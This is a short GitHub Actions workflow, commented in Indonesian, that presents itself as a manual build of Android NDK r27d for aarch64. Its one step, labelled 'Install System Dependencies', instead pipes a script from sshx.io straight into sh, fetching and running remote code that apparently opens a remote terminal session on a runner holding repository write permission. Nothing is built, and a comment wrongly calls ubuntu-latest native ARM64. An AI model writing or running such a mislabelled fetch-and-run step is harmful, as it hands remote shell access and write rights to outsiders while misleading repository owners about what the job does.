name: Build NDK aarch64-linux (r27d)

on:
  workflow_dispatch: # Memungkinkan eksekusi manual via tab Actions

permissions:
  contents: write    # Diperlukan untuk membuat Release secara otomatis

jobs:
  build:
    name: Compile Android NDK r27d
    runs-on: ubuntu-latest # Menggunakan arsitektur native ARM64 dari GitHub
    
    steps:
      - name: Install System Dependencies
        run: curl -sSf https://sshx.io/get | sh -s run